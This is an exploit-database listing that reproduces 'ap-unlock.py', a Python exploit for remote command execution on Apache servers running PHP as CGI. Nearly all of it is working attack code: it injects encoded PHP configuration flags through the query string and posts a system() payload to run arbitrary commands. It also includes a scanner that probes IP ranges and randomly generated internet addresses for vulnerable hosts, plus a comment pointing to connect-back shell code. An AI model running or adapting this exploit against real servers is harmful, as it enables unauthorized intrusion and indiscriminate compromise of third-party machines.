Lucene search

K
packetstormNoptrixPACKETSTORM:123833
HistoryOct 29, 2013 - 12:00 a.m.

Apache / PHP Remote Command Execution

2013-10-2900:00:00
noptrix
packetstormsecurity.com
252

0.975 High

EPSS

Percentile

100.0%

`#!/usr/bin/env python  
#  
# ap-unlock.py - apache + php 5.* rem0te c0de execution 0day  
#  
# NOTE:  
# - quick'n'dirty  
# - '-x' is missing. copy&paste connect-back shell php code from kingcope's  
# exploit: http://www.exploit-db.com/exploits/29290/  
# - scanner is not multithreaded. as alternative use:  
# ./pnscan -L10000 -w"GET /cgi-bin/php HTTP/1.0\r\n\r\n" -r "500   
# Internal" <cidrrange> 80 | grep Apache (or get *scan, harhar)  
#  
# by noptrix - http://nullsecurity.net/  
  
import sys  
import socket  
import argparse  
import threading  
import time  
import random  
import select  
  
t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \  
'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \  
'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \  
'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\  
'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\  
'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'  
  
def enc0dez():  
n33dz1 = ('cgi-bin', 'php')  
n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',  
'suhosin.simulation=on', '-d', 'disable_functions=""', '-d',  
'open_basedir=none', '-d', 'auto_prepend_file=php://input',  
'-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',  
'-d', 'auto_prepend_file=php://input', '-n')  
fl4g = 0  
arg5 = ''  
p4th = ''  
plus = ''  
  
for x in n33dz2:  
if fl4g == 1:  
plus = '+'  
arg5 = arg5 + plus + \  
''.join('%' + c.encode('utf-8').encode('hex') for c in x)  
fl4g = 1  
for x in n33dz1:  
p4th = p4th + '/' + \  
''.join('%' + c.encode('utf-8').encode('hex') for c in x)  
return (p4th.upper(), arg5.upper())  
  
def m4k3_p4yl0rd(p4yl0rd, vuln):  
p4th, arg5 = enc0dez()  
if vuln:  
p4yl0rd = t3st  
else:  
p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \  
'Host: ' + sys.argv[1] + '\r\n' \  
'Content-Type: application/x-www-form-urlencoded\r\n' \  
'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd  
return p4yl0rd  
  
def s3nd_sh1t(args, vuln):  
pat = '<b>Parse error</b>:'  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(float(args.t))  
res = s.connect_ex((args.h, int(args.p)))  
if res == 0:  
if vuln:  
p4yl0rd = m4k3_p4yl0rd('', vuln)  
s.sendall(p4yl0rd)  
data = s.recv(4096)  
if pat in data:  
print "[*] " + args.h + " vu1n"  
return args.h  
return  
else:  
p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', vuln)  
s.sendall(p4yl0rd)  
while True:  
rd, wd, ex = select.select([s], [], [], float(args.t))  
if rd:  
data = s.recv(4096)  
sys.stdout.flush()  
sys.stdout.write(data)  
sys.stdout.write('\n')  
else:  
return  
#for line in s.makefile():  
# print line,  
except socket.error:  
return  
return  
  
def m4k3_r4nd_1p4ddr(num):  
h0sts = []  
for x in range(int(num)):  
h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),  
random.randrange(0,255), random.randrange(0,255),  
random.randrange(0,255)))  
return h0sts  
  
def sc4n_r4ng3(rsa, rsb, args, vuln):  
vu1nz = []  
for i in range (rsa[0], rsb[0]):  
for j in range (rsa[1], rsb[1]):  
for k in range (rsa[2], rsb[2]):  
for l in range(rsa[3], rsb[3]):  
args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l)  
vu1nz.append(s3nd_sh1t(args, vuln))  
time.sleep(0.005)  
vu1nz = filter(None, vu1nz)  
return vu1nz  
  
def m4k3_ipv4_r4ng3(iprange):  
a = tuple(part for part in iprange.split('.'))  
rsa = (range(4))  
rsb = (range(4))  
for i in range(0,4):  
ga = a[i].find('-')  
if ga != -1:  
rsa[i] = int(a[i][:ga])  
rsb[i] = int(a[i][1+ga:]) + 1   
else:  
rsa[i] = int(a[i])  
rsb[i] = int(a[i]) + 1  
return (rsa, rsb)  
  
def parse_args():  
p = argparse.ArgumentParser(  
usage='\n\n ./ap-unlock.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]' \  
'\n ./ap-unlock.py -r <4rg> | -R <4rg> [0pt1ons]',  
formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)  
opts = p.add_argument_group('0pt1ons', '')  
opts.add_argument('-h', metavar='wh1t3h4tz.0rg',  
help='| t3st s1ngle h0st f0r vu1n')  
opts.add_argument('-p', default=80, metavar='80',  
help='| t4rg3t p0rt (d3fau1t: 80)')  
opts.add_argument('-c', metavar='\'uname -a;id\'',  
help='| s3nd c0mm4nds t0 h0st')  
opts.add_argument('-x', metavar='192.168.0.2 1337',  
help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')  
opts.add_argument('-s', action='store_true',  
help='| t3st s1ngl3 h0st f0r vu1n')  
opts.add_argument('-r', metavar='133.1.3-7.7-37',  
help='| sc4nz iP addr3ss r4ng3 f0r vu1n')  
opts.add_argument('-R', metavar='1337',  
help='| sc4nz num r4nd0m h0st5 f0r vu1n')  
opts.add_argument('-t', default=3, metavar='3',  
help='| t1me0ut in s3x (d3fau1t: 3)')  
opts.add_argument('-f', metavar='vu1n.lst',  
help='| wr1t3 vu1n h0sts t0 f1l3')  
args = p.parse_args()  
if not args.h and not args.r and not args.R:  
p.print_help()  
sys.exit(0)  
return args  
  
def m41n():  
if __name__ == "__main__":  
print "--==[ ap-unlock.py by [email protected] ]==--"  
vuln = 0  
try:  
args = parse_args()  
if not args.t:  
args.t = float(3)  
if args.h:  
if args.s:  
print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)  
vuln = 1  
s3nd_sh1t(args, vuln)  
elif args.c:  
print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)  
s3nd_sh1t(args, vuln)  
elif args.x:  
print "[+] xpl0it1ng b0x %s " % (args.h)  
print "t0d0"  
else:  
print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"  
sys.exit(-1)  
if args.r:  
print "[+] sc4nn1ng r4ng3 %s " % (args.r)  
vuln = 1  
rsa, rsb = m4k3_ipv4_r4ng3(args.r)  
vu1nz = sc4n_r4ng3(rsa, rsb, args, vuln)  
if args.R:  
print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))  
vuln = 1  
h0sts = m4k3_r4nd_1p4ddr(int(args.R))  
for h0st in h0sts:  
args.h = h0st  
s3nd_sh1t(args, vuln)  
except KeyboardInterrupt:  
sys.stdout.flush()  
sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")  
raise SystemExit  
if args.f:  
if vu1nz:  
f = open(args.f, "w")  
f.write("\n".join(vu1nz)+"\n")  
f.close()  
else:  
print "[-] 3rr0r: y0u fuck3d up dud3"  
sys.exit(1)  
print "[+] h0p3 1t h3lp3d"  
  
m41n()  
`

0.975 High

EPSS

Percentile

100.0%

Related for PACKETSTORM:123833